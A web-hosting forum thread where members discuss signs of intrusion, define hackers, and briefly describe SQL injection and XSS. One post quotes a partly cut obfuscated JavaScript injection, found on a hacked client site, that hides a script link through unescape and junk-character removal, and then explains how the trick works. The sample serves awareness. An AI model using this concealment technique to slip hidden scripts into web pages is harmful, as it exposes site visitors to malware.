Detecting Hackers

[GoGeTTeR]

Hackers, by nature are very stealthy. Their ability to gain access to your computer through the Internet can easily be done without your knowledge - and most of them seem to prefer that approach. Before time is spent on being able to detect a hacker, it should be noted that a determined hacker will not be stopped! They will get in - even to the Department of Defenses systems!

Some common things that might tip you off to an intrusion are:
Lights showing hard drive activity being busier than what your own activities call for
Suspicious files left on your computer - often in the Windows Temp directory with a tmp. suffix
Obvious tampering - destroyed files, missing files, etc.
Or, the worst case - someone's taking money out of your bank account or using your credit cards (Please note, though, that this could also be the result of phishing, too - not necessarily hacking)
Your firewall keeps receives multiple packets from a single web address and notifies you.

[Caroline]

Well, Hackers have been a problem for many people from a very long time. They are very intelligent and they create a lot of problems for people as they are aware of all the technical details of the computer, server etc. There are many measures which can protect your computer,server etc from Hackers. However, these measures can also prove to be useless at times.

[Harry]

Yes, there are many oversmart webmaster who love to play with network and servers, they feel great if they managed to hook any server
As a part of server/system security you should keep updated security patches installed on your machine. Close all unnecessary ports of your server which can used by hackers to get into your server.

[Matt123]

Hey you might feel like me. However, here are few definitions for Hacker.

a) Someone who plays golf poorly
b) One who kicks wildly or roughly
c) One who mindlessly alters code without a defined goal
d) A card game
e) One who works hard at boring tasks
And many more

However the one we are discussing here is a programmer who breaks into computer systems in order to steal or change or destroy information as a form of cyber-terrorism.

[Caroline]

Quote:

Originally Posted by Matt123

Hey you might feel like me. However, here are few definitions for Hacker.

a) Someone who plays golf poorly
b) One who kicks wildly or roughly
c) One who mindlessly alters code without a defined goal
d) A card game
e) One who works hard at boring tasks
And many more

I don't think it was necessary to mention the above definitions. If you keep on posting unnecessary information like this, I think the forum administrator will you. lol.

Let's come to the topic now. A Hacker can be defined as a person who tries to access the computer/system for information without the permissions of the owner.

[Matt123]

Quote:

Originally Posted by Caroline

I don't think it was necessary to mention the above definitions. If you keep on posting unnecessary information like this, I think the forum administrator will you. lol.

I just thought to share those definitions with all my forummates and that's the reason I put them here.
Anyways not only computers/systems can be hacked however it is often possible that your websites also get hacked.
There are many ways that hacker attacks your site and you might not be aware of it. Tried to post 2 of them here and they are:-

a) SQL Injection:- It is a technique using which a piece of malicious code can be injected in a web application, exploiting a security vulnerability of databases leading to change their behavior. This kind of attack might affect searching a phrase or a word, logging in to the account, processing email registration, manipulating URL etc.

b) Cross-Site Scripting (XSS):- It is a technique using which malicious code can be injected in a webpage, exploiting security vulnerabilities of web applications. While processing a request obtained from the user input, this kind of attack is often possible that affect checking and validating users request before it returns to the final user.

[Harry]

Calm down Caroline and Matt, please try to maintain peace on board, everyone here on Webhosting UK board have total freedom for expressing their thoughts and can speak freely on whatever subject they want. Main intention behind setting up forum is to have friendly community where all members can interact and can share knowledge.

[Caroline]

Oh Harry, . We also believe in maintaining a healthy relationship. We are just trying to create a good and funny environment on board.

[black-dog]

Quote:

Originally Posted by Caroline

Let's come to the topic now. A Hacker can be defined as a person who tries to access the computer/system for information without the permissions of the owner.

Actually, it's rather more difficult than that...
Hacker (computing) - Wikipedia, the free encyclopedia

[Harry]

Quote:

Originally Posted by Caroline

Oh Harry, . We also believe in maintaining a healthy relationship. We are just trying to create a good and funny environment on board.

Good to know Caroline, you are too smart trying to turn a serious discussion into funny environment. I think this thread should be moved in Fun Stuff section now. lol

[Caroline]

Quote:

Originally Posted by harry

Good to know Caroline, you are too smart trying to turn a serious discussion into funny environment. I think this thread should be moved in Fun Stuff section now. lol

Oh Harry, this is no longer a serious discussion. The serious discussion was ended when Matt had posted the information which wasn't required. Anyways, I wanted to thank Black dog for the useful link which he has provided which will make us aware of hackers.

[Harry]

Quote:

Originally Posted by Caroline

Oh Harry, this is no longer a serious discussion. The serious discussion was ended when Matt had posted the information which wasn't required.

..............

[Matt123]

Quote:

Originally Posted by Caroline

Oh Harry, this is no longer a serious discussion. The serious discussion was ended when Matt had posted the information which wasn't required. Anyways, I wanted to thank Black dog for the useful link which he has provided which will make us aware of hackers.

You should also see the 6th post of this thread which points that I was the one to restart the serious discussion.

And yes thank you Black Dog, the link is really helpful.

[black-dog]

Quote:

Originally Posted by Matt123

You should also see the 6th post of this thread which points that I was the one to restart the serious discussion.

And yes thank you Black Dog, the link is really helpful.

I agree that it's serious. I wasted the better part of a day last week because a site belonging to a client of mine had been hacked. He's in the US and because the site serving up the malware had a UK connection (see: Google Safe Browsing diagnostic page for 78.110.175.0) he thought of me.

We still don't know how the malicious code was injected into his pages.

This is the kind of thing you should look out for (I've cut out some of the code)

Code:

<script language=javascript><!--  
document.write(unescape('%3CscFd5rI ... jZQJqueryCQ%2EFd5js%3E0d%3CIz%2FscriFd5piL7ti
L7%3E').replace(/0d|Iz|Up|iL7|ZQJ|C6|CQ|Fd5|z3L/g,""));
--></script>

Sneaky. The replace part simply deletes all instances of the random characters between the pipes. What's left is a link to a javascript file which has been converted to hexadecimal. unescape converts it back. All designed to stop you from recognising what it is.

The following site has a handy conversion utility: HTML & JavaScript Encoder/Decoder

You can use this method (legitimately) to hide an email address.

Or send a secret message:

Code:

%42%65%20%61%6C%65%72%74%21%20
%44%6F%6E%27%74%20%6C%65%74%20%74%68%65%20
%68%61%63%6B%65%72%73%20%77%69%6E%2E

[Matt123]

Oh! It's too difficult to find that how malicious code was injected to his site which infected 10651 domains. Pretty serious!

However here are few tips in order to prevent your site from malicious code:-
a) Installing executable softwares shall be avoided.
b) Before installing any software, verify if it is free of malicious code.
c) Additional measures shall be taken like blocking specific IP source addresses or IP ports, blocking specific email messages or attachments, or blocking specific email sender addresses or domains.
And many more!